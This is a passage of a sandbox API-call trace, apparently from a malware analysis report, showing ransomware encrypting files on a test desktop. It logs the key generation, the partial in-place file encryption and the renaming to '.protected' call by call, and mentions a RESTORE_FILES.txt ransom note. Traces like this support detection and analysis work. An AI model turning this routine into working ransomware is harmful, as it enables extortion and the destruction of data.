returned 0x0 [0091.273] lstrcmpW (lpString1="lUXppUcJoNKpaU.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0091.273] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.273] 
CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lUXppUcJoNKpaU.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\luxppucjonkpau.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.273] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lUXppUcJoNKpaU.mp3") returned 60 [0091.273] StrStrW (lpFirst="lUXppUcJoNKpaU.mp3", lpSrch=".txt") returned 0x0 [0091.273] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lUXppUcJoNKpaU.mp3") returned 60 [0091.273] StrStrW (lpFirst="lUXppUcJoNKpaU.mp3", lpSrch=".rar") returned 0x0 [0091.273] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lUXppUcJoNKpaU.mp3") returned 60 [0091.273] StrStrW (lpFirst="lUXppUcJoNKpaU.mp3", lpSrch=".zip") returned 0x0 [0091.273] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.274] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.274] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.274] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.274] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.274] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.274] CloseHandle (hObject=0xb4) returned 1 [0091.274] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lUXppUcJoNKpaU.mp3.protected") returned 70 [0091.275] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lUXppUcJoNKpaU.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\luxppucjonkpau.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lUXppUcJoNKpaU.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\luxppucjonkpau.mp3.protected")) returned 1 [0091.275] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.275] lstrcmpiW (lpString1="M MPYvNo.m4a", lpString2="Windows") returned -1 [0091.276] lstrcmpiW (lpString1="M MPYvNo.m4a", lpString2="Program Files") returned -1 [0091.276] lstrcmpiW (lpString1="M MPYvNo.m4a", lpString2="Program Files (x86)") returned -1 [0091.276] lstrcmpiW (lpString1="M MPYvNo.m4a", lpString2="$Recycle.bin") returned 1 [0091.276] lstrcmpiW (lpString1="M MPYvNo.m4a", lpString2="System Volume Information") returned -1 [0091.276] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M MPYvNo.m4a") returned 54 [0091.276] StrStrIW (lpFirst="M MPYvNo.m4a", lpSrch=".protected") returned 0x0 [0091.276] lstrcmpW (lpString1="M MPYvNo.m4a", lpString2="RESTORE_FILES.txt") returned -1 [0091.276] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) 
returned 1 [0091.276] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M MPYvNo.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m mpyvno.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M MPYvNo.m4a") returned 54 [0091.276] StrStrW (lpFirst="M MPYvNo.m4a", lpSrch=".txt") returned 0x0 [0091.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M MPYvNo.m4a") returned 54 [0091.276] StrStrW (lpFirst="M MPYvNo.m4a", lpSrch=".rar") returned 0x0 [0091.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M MPYvNo.m4a") returned 54 [0091.276] StrStrW (lpFirst="M MPYvNo.m4a", lpSrch=".zip") returned 0x0 [0091.276] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.277] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.277] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.277] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.277] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: 
lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.277] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.277] CloseHandle (hObject=0xb4) returned 1 [0091.277] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M MPYvNo.m4a.protected") returned 64 [0091.277] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M MPYvNo.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m mpyvno.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M MPYvNo.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m mpyvno.m4a.protected")) returned 1 [0091.278] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.278] lstrcmpiW (lpString1="mudpcd.exe", lpString2="Windows") returned -1 [0091.279] lstrcmpiW (lpString1="mudpcd.exe", lpString2="Program Files") returned -1 [0091.279] lstrcmpiW (lpString1="mudpcd.exe", lpString2="Program Files (x86)") returned -1 [0091.279] lstrcmpiW (lpString1="mudpcd.exe", lpString2="$Recycle.bin") returned 1 [0091.279] lstrcmpiW (lpString1="mudpcd.exe", lpString2="System Volume Information") returned -1 [0091.279] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mudpcd.exe") returned 52 [0091.279] StrStrIW (lpFirst="mudpcd.exe", lpSrch=".protected") returned 0x0 [0091.279] lstrcmpW (lpString1="mudpcd.exe", lpString2="RESTORE_FILES.txt") returned -1 [0091.279] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.279] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mudpcd.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mudpcd.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.279] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.279] lstrcmpiW (lpString1="mZx0.gif", lpString2="Windows") returned -1 [0091.279] lstrcmpiW (lpString1="mZx0.gif", lpString2="Program Files") returned -1 [0091.279] lstrcmpiW (lpString1="mZx0.gif", lpString2="Program Files (x86)") returned -1 [0091.279] lstrcmpiW (lpString1="mZx0.gif", lpString2="$Recycle.bin") returned 1 [0091.279] lstrcmpiW (lpString1="mZx0.gif", lpString2="System Volume Information") returned -1 [0091.279] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mZx0.gif") returned 50 [0091.279] StrStrIW (lpFirst="mZx0.gif", lpSrch=".protected") returned 0x0 [0091.279] lstrcmpW (lpString1="mZx0.gif", lpString2="RESTORE_FILES.txt") returned -1 [0091.279] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.279] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mZx0.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mzx0.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.280] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mZx0.gif") returned 50 [0091.280] StrStrW (lpFirst="mZx0.gif", lpSrch=".txt") returned 0x0 [0091.280] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mZx0.gif") returned 50 [0091.280] StrStrW (lpFirst="mZx0.gif", lpSrch=".rar") returned 0x0 [0091.280] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mZx0.gif") returned 50 [0091.280] StrStrW (lpFirst="mZx0.gif", lpSrch=".zip") returned 0x0 [0091.280] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.280] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.280] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.280] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.280] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.281] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.281] CloseHandle (hObject=0xb4) returned 1 [0091.281] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mZx0.gif.protected") returned 60 [0091.281] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mZx0.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mzx0.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mZx0.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mzx0.gif.protected")) returned 1 [0091.282] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.282] lstrcmpiW (lpString1="njcrT dUf57RZrzRXlE6.gif", lpString2="Windows") returned -1 [0091.282] lstrcmpiW (lpString1="njcrT dUf57RZrzRXlE6.gif", lpString2="Program Files") returned -1 [0091.282] lstrcmpiW (lpString1="njcrT dUf57RZrzRXlE6.gif", lpString2="Program Files (x86)") returned -1 [0091.282] lstrcmpiW (lpString1="njcrT dUf57RZrzRXlE6.gif", lpString2="$Recycle.bin") returned 1 [0091.282] lstrcmpiW (lpString1="njcrT dUf57RZrzRXlE6.gif", lpString2="System Volume Information") returned -1 [0091.282] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njcrT dUf57RZrzRXlE6.gif") returned 66 [0091.282] StrStrIW (lpFirst="njcrT dUf57RZrzRXlE6.gif", lpSrch=".protected") returned 0x0 [0091.282] lstrcmpW (lpString1="njcrT dUf57RZrzRXlE6.gif", lpString2="RESTORE_FILES.txt") returned -1 [0091.282] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.282] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njcrT dUf57RZrzRXlE6.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\njcrt duf57rzrzrxle6.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.283] 
lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njcrT dUf57RZrzRXlE6.gif") returned 66 [0091.283] StrStrW (lpFirst="njcrT dUf57RZrzRXlE6.gif", lpSrch=".txt") returned 0x0 [0091.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njcrT dUf57RZrzRXlE6.gif") returned 66 [0091.283] StrStrW (lpFirst="njcrT dUf57RZrzRXlE6.gif", lpSrch=".rar") returned 0x0 [0091.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njcrT dUf57RZrzRXlE6.gif") returned 66 [0091.283] StrStrW (lpFirst="njcrT dUf57RZrzRXlE6.gif", lpSrch=".zip") returned 0x0 [0091.283] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.284] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.284] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.284] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.284] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.284] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.284] CloseHandle (hObject=0xb4) returned 1 [0091.284] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njcrT dUf57RZrzRXlE6.gif.protected") returned 76 [0091.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njcrT dUf57RZrzRXlE6.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\njcrt duf57rzrzrxle6.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njcrT dUf57RZrzRXlE6.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\njcrt duf57rzrzrxle6.gif.protected")) returned 1 [0091.286] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.286] lstrcmpiW (lpString1="nTq0cb2.odp", lpString2="Windows") returned -1 [0091.286] lstrcmpiW (lpString1="nTq0cb2.odp", lpString2="Program Files") returned -1 [0091.286] lstrcmpiW (lpString1="nTq0cb2.odp", lpString2="Program Files (x86)") returned -1 [0091.286] lstrcmpiW (lpString1="nTq0cb2.odp", lpString2="$Recycle.bin") returned 1 [0091.286] lstrcmpiW (lpString1="nTq0cb2.odp", lpString2="System Volume Information") returned -1 [0091.286] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nTq0cb2.odp") returned 53 [0091.286] StrStrIW (lpFirst="nTq0cb2.odp", lpSrch=".protected") returned 0x0 [0091.286] lstrcmpW (lpString1="nTq0cb2.odp", lpString2="RESTORE_FILES.txt") returned -1 [0091.286] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.286] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nTq0cb2.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ntq0cb2.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nTq0cb2.odp") returned 53 [0091.286] StrStrW (lpFirst="nTq0cb2.odp", lpSrch=".txt") returned 0x0 [0091.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nTq0cb2.odp") returned 53 [0091.286] StrStrW (lpFirst="nTq0cb2.odp", lpSrch=".rar") returned 0x0 [0091.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nTq0cb2.odp") returned 53 [0091.286] StrStrW (lpFirst="nTq0cb2.odp", lpSrch=".zip") returned 0x0 [0091.286] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.287] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.287] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.287] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.287] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.287] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.287] CloseHandle (hObject=0xb4) returned 1 [0091.287] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nTq0cb2.odp.protected") returned 63 [0091.287] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nTq0cb2.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ntq0cb2.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nTq0cb2.odp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ntq0cb2.odp.protected")) returned 1 [0091.288] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.288] lstrcmpiW (lpString1="PVIaNn zCaW2Y8.gif", lpString2="Windows") returned -1 [0091.288] lstrcmpiW (lpString1="PVIaNn zCaW2Y8.gif", lpString2="Program Files") returned 1 [0091.288] lstrcmpiW (lpString1="PVIaNn zCaW2Y8.gif", lpString2="Program Files (x86)") returned 1 [0091.288] lstrcmpiW (lpString1="PVIaNn zCaW2Y8.gif", lpString2="$Recycle.bin") returned 1 [0091.288] lstrcmpiW (lpString1="PVIaNn zCaW2Y8.gif", lpString2="System Volume Information") returned -1 [0091.288] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PVIaNn zCaW2Y8.gif") returned 60 [0091.288] StrStrIW (lpFirst="PVIaNn zCaW2Y8.gif", lpSrch=".protected") returned 0x0 [0091.288] lstrcmpW (lpString1="PVIaNn zCaW2Y8.gif", lpString2="RESTORE_FILES.txt") returned -1 [0091.289] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.289] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PVIaNn zCaW2Y8.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pviann zcaw2y8.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.289] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PVIaNn zCaW2Y8.gif") returned 60 [0091.289] StrStrW (lpFirst="PVIaNn zCaW2Y8.gif", lpSrch=".txt") returned 0x0 [0091.289] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PVIaNn zCaW2Y8.gif") returned 60 [0091.289] StrStrW (lpFirst="PVIaNn zCaW2Y8.gif", lpSrch=".rar") returned 0x0 [0091.289] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PVIaNn zCaW2Y8.gif") returned 60 [0091.289] StrStrW (lpFirst="PVIaNn zCaW2Y8.gif", lpSrch=".zip") returned 0x0 [0091.289] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.290] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.290] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.290] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.290] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, 